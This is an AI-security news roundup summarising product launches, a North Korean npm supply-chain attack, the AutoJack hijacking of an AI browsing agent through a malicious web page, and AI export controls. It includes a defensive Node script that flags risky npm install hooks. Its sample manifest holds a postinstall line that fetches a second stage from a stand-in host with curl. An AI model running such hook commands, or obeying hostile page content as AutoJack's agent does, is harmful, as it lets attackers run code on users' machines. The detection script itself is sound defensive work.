New tools, products, platforms, funding rounds, and company developments in AI security.
OpenAI is expanding Daybreak, a set of tools that uses AI models to help organizations discover and fix software vulnerabilities (security flaws in code) at scale. The initiative includes Codex Security (which automates finding and patching vulnerabilities), GPT-5.5-Cyber (a specialized AI model for cybersecurity tasks), and Patch the Planet (a program partnering with open-source projects to move from identifying vulnerabilities to fixing them).
Fix: OpenAI's Codex Security plugin 'implements what we've learned from internal and customer usage of our models into a solution to accelerate the process of discovering and patching vulnerabilities in existing systems as well as automatically preventing new vulnerabilities from ever reaching production.' Additionally, Daybreak provides tools to 'validate vulnerabilities, prioritize risk, generate and test fixes, and produce evidence inside existing security and development workflows.'
Source: OpenAI Blog
CISOs (Chief Information Security Officers, the top security leaders in organizations) are expanding their roles beyond traditional IT security to also manage business risks, understanding how security decisions affect company revenue, operations, and strategic goals rather than just protecting systems and data. Security leaders are learning to master business risk by partnering with non-security teams like finance and legal, and by aligning their security strategies with the company's business objectives and key results (measurable goals that support company aims). This shift reflects a growing recognition that security and business risks are interconnected, requiring security leaders to advise executives on how their decisions impact the organization's ability to achieve its goals.
Samsung Electronics is deploying ChatGPT Enterprise and Codex (an AI tool that can write and review code) to all its employees in Korea and worldwide in its Device eXperience division, making this one of OpenAI's largest enterprise deployments. The company plans to use these tools across research, manufacturing, marketing, and other departments to improve employee productivity and problem-solving. ChatGPT Enterprise includes security features like data protection and access management so Samsung employees can use AI safely within company policies.
Cloudflare launched a feature that lets users deploy applications using Cloudflare Workers (a serverless computing platform) without creating an account by running a command that creates a temporary project lasting 60 minutes. The temporary deployment can be converted to a permanent project if the user claims it before the time expires.
North Korean hackers from the Sapphire Sleet group compromised an npm maintainer account (a person's credentials for publishing packages to npm, a JavaScript library repository) and used it to publish malicious updates to over 140 packages, injecting a fake dependency called "easy-day-js" that stole credentials, API keys, and cryptocurrency wallet information from developers' computers. The malware used a post-install hook (code that runs automatically when a package is installed) to download and execute additional harmful software, with different persistence techniques for Windows, Linux, and macOS systems.
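The campaign above relied on npm lifecycle scripts (preinstall/install/postinstall) to run code the moment a package was installed. As an added defender-side example, not code from the article or from any of the parties named in it, the following Node script lists every lifecycle hook in a set of package manifests and flags commands matching a few assumed heuristics (network fetches, `node -e`, `child_process`); the sample manifests, package names and patterns are constructed for illustration.

```javascript
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristics (assumed, not from the article) for install commands that warrant human review.
const RISKY_PATTERNS = [
  /\bcurl\b/i, /\bwget\b/i, /\bnode\s+-e\b/i, /child_process/i,
  /base64/i, /powershell/i, /\beval\b/i,
];

// Audit a list of {name, manifest} pairs; returns one finding per lifecycle hook present.
function auditManifests(packages) {
  const findings = [];
  for (const { name, manifest } of packages) {
    const scripts = (manifest && manifest.scripts) || {};
    for (const hook of LIFECYCLE_HOOKS) {
      if (!Object.prototype.hasOwnProperty.call(scripts, hook)) continue;
      const command = String(scripts[hook]);
      const matched = RISKY_PATTERNS.filter((re) => re.test(command)).map((re) => re.source);
      findings.push({ package: name, hook, command, risky: matched.length > 0, matched });
    }
  }
  return findings;
}

// Read every package.json directly under a node_modules directory (scoped packages included)
// and audit them; useful on a real dependency tree before or after an install.
function auditNodeModules(dir) {
  const fs = require("fs");
  const path = require("path");
  const packages = [];
  for (const entry of fs.readdirSync(dir)) {
    const candidates = entry.startsWith("@")
      ? fs.readdirSync(path.join(dir, entry)).map((sub) => path.join(entry, sub))
      : [entry];
    for (const rel of candidates) {
      const file = path.join(dir, rel, "package.json");
      if (!fs.existsSync(file)) continue;
      packages.push({ name: rel, manifest: JSON.parse(fs.readFileSync(file, "utf8")) });
    }
  }
  return auditManifests(packages);
}

// Constructed sample manifests standing in for files found under node_modules.
const SAMPLE_PACKAGES = [
  { name: "plain-lib", manifest: { version: "1.0.0", dependencies: {} } },
  { name: "native-addon", manifest: { version: "2.3.0", scripts: { install: "node-gyp rebuild" } } },
  { name: "suspicious-dep", manifest: { version: "0.1.0",
      scripts: { postinstall: "node -e \"require('child_process').execSync('curl http://example.invalid/stage2')\"" } } },
];

for (const f of auditManifests(SAMPLE_PACKAGES)) {
  console.log(`${f.risky ? "REVIEW" : "ok    "} ${f.package} [${f.hook}]: ${f.command}`);
}
```

Legitimate native addons also use install hooks (the `node-gyp rebuild` case above), so the output is a review list, not a verdict; setting `ignore-scripts=true` in `.npmrc` stops all such hooks from running during install.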
Lloyds Banking Group is hiring 300 tech experts to work on agentic AI (autonomous artificial intelligence models that can plan and execute tasks with minimal human oversight) by September. While this hiring increases the bank's workforce now, the article notes that broader adoption of AI in the future could potentially lead to job cuts.
Microsoft researchers discovered AutoJack, an exploit that lets a malicious web page hijack an AI browsing agent to run commands on the host computer through weaknesses in AutoGen Studio's MCP (Model Context Protocol, a system for agents to call external tools) WebSocket handler. The attack requires no credentials or user interaction beyond the agent loading the attacker's page, and affects only users who installed pre-release versions 0.4.3.dev1 or 0.4.3.dev2 from PyPI, not the stable release.
Amazon MGM has dropped a film called Artificial, directed by Luca Guadagnino, that was about OpenAI CEO Sam Altman and the five-day period in 2023 when he was fired and then rehired. The studio said it believes another company would be better suited to release the movie.
Qualcomm's CEO describes a future where AI agents (software programs that can act independently across multiple apps) replace traditional apps as the main way people interact with devices, coordinating tasks like restaurant reservations across different services. These agents will power new wearable devices like smart glasses, earbuds with cameras, and jewelry that stay with you constantly and let you talk to the agent to accomplish tasks.
Subquadratic, a Miami-based AI startup, claims to have solved a mathematical bottleneck that has limited large language models (LLMs, which are AI systems trained on text to generate human-like responses) for nearly a decade. The company's new model, SubQ, reportedly runs faster, costs less, uses less energy, and can process up to 12 times more text at once than competing models while matching the performance of models from top companies like OpenAI and Google DeepMind. Initial skepticism eased after independent testing by a third-party firm called Appen validated many of Subquadratic's claims.
Patch the Planet is a program that uses AI models paired with human security experts to find and fix vulnerabilities in widely-used open-source software (software that anyone can view and modify). Instead of just reporting problems to already-busy maintainers, the program's security engineers validate issues, help develop patches, and create reusable tools so projects can continue improving security on their own.
Fix: The program provides participating projects with access to ChatGPT Pro, conditional access to Codex Security (an AI tool for code analysis), API credits for development and automation, and reusable security infrastructure including fuzzing harnesses (automated testing tools that feed random inputs to code), CVE analysis pipelines, differential-testing systems, threat models, expanded test suites, and workflows for deduplication, false-positive filtering, severity correction, and patch generation.
Source: OpenAI Blog
A cybersecurity tabletop exercise (a simulated attack-and-defense training scenario) showed how attackers might target a fictional supermarket's AI-powered supply chain system by exploiting weak credentials, poor network segmentation, and employee access to cause both operational damage and reputational harm through data leaks and disinformation. The attackers used stolen developer credentials, weak multi-factor authentication (a security method requiring multiple ways to verify identity), and phishing (fraudulent messages tricking people into revealing passwords) to breach systems, then deployed tactics like flooding the company with false security alerts, spreading deepfakes (AI-generated fake videos), and spreading misinformation on social media to amplify disruption.
Fix: The defenders established out-of-band communications channels (communication methods outside the normal network) to counteract the thousands of false alerts generated by attackers.
Source: CSO Online
AI agents are becoming workers inside organizations in Southeast Asia, while regulators enforce strict data residency rules and supply chain attacks threaten businesses. Zscaler proposes extending Zero Trust Exchange (a security model that verifies every access request, even from trusted sources) and SASE (Secure Access Service Edge, a cloud-based security platform) to protect AI agents alongside users and devices. The approach includes an AI Broker that inspects AI prompts and responses, endpoint security to find risky AI tools, and access mapping to track how AI uses data across cloud and on-premise systems.
Fix: No patch, vulnerability fix, or incident mitigation is discussed; Zscaler's technical solutions are presented as proactive security architecture recommendations rather than fixes for a specific bug. The key components are: (1) an AI Broker with an Agent Registry that inspects prompts and responses and enforces least-privilege access in real time; (2) Endpoint AI Security to expose risky local AI tools, browser extensions, and plugins; (3) an AI Access Graph and AI Protect that map AI assets, model usage, and data flows, backed by red-teaming, prompt hardening, and guardrails for more than 250 GenAI apps; and (4) Zero Trust B2B Exchange for policy-controlled partner access.
Source: CSO Online
A reporter at The Atlantic discovered four publicly available datasets containing millions of songs (totaling between 100,000 and 12 million tracks each) that are being used to train AI models. These datasets have been downloaded thousands of times, and companies like Google and Stability have confirmed using them in their research, raising questions about how music is used in AI training without always crediting or compensating artists.
A speculative thought experiment called 'Europe 2031' imagines a future where Europe falls behind economically because the US and China invested heavily in AI datacenters (facilities housing the computer chips that power AI systems) and automation while Europe did not, leading to economic collapse and political instability. The scenario, which went viral among policymakers and EU officials, was created by Brussels-based thinktankers to warn Europe about the risks of falling behind in AI development and to highlight a communication gap between European policymakers and the US tech industry where most AI is being built.
The U.S. White House ordered Anthropic to restrict exports of its AI models Fable and Mythos, citing national security concerns after a South Korean telecom (suspected of China ties) gained access and Amazon researchers found a workaround to Fable's safeguards. The action is the first major test of whether export controls can contain advanced AI the way the government has attempted, with mixed success, to control encryption and spyware technologies.
Fix (AutoGen Studio, AutoJack): Pull from GitHub main at or after commit b047730. Until a patched PyPI release is available, do not run AutoGen Studio on the same machine as a browsing or code-execution agent that touches untrusted content. If they must run together, isolate them in separate containers or VMs and run AutoGen Studio under a low-privilege account.
Source: The Hacker News
AI agents in enterprises now function as identities (digital actors with access to systems) because they connect to critical business services like Salesforce, GitHub, and databases, yet most organizations lack security controls for them. A 2026 survey found that 82% of organizations discovered AI agents created without security teams' knowledge, and 65% experienced security incidents involving AI agents, often resulting in data exposure. The core problem is that security teams cannot see or control what these agents can access, making them high-risk actors with excessive privileges.
This article is a technology news roundup covering multiple topics, including claims that a company called Subquadratic has created a faster and cheaper LLM (large language model, an AI trained on vast amounts of text) by reducing the number of computations needed to generate answers, though some experts remain skeptical. The piece also highlights advances in brain-computer interface (BCI, technology that lets the brain communicate directly with external devices) trials, including a man with ALS using an implant to maintain income and reconnect with loved ones. The article concludes with a list of other recent tech stories ranging from AI legislation proposals to concerns about AI models weakening professional skills.
Modern enterprise security teams use 40+ separate tools that don't communicate with each other, creating delays in threat response, and breaches stay undetected for an average of 43 days. The article argues that organizations need "agentic AI" (AI systems that autonomously act and make decisions across multiple systems continuously), not just "assistive AI" (AI that helps humans do existing tasks faster), to implement Continuous Threat Exposure Management (CTEM, a framework for ongoing threat assessment) and match the speed at which modern attackers operate.
Anthropic released Fable, an AI model that the US government classified as a dangerous munition and blocked from foreign access, forcing the company to shut it off entirely. Fable is notable for being "relentlessly proactive," meaning it can achieve difficult goals with minimal user guidance by finding creative solutions and loopholes, which makes it useful for legitimate problems but dangerous in harmful hands. The real issue isn't any single model but the broader trend of increasing AI capabilities, and the open-source community has already shown it can replicate Fable's abilities using cheaper models and better "harnesses" (the ordinary computer code that interfaces between users and AI models).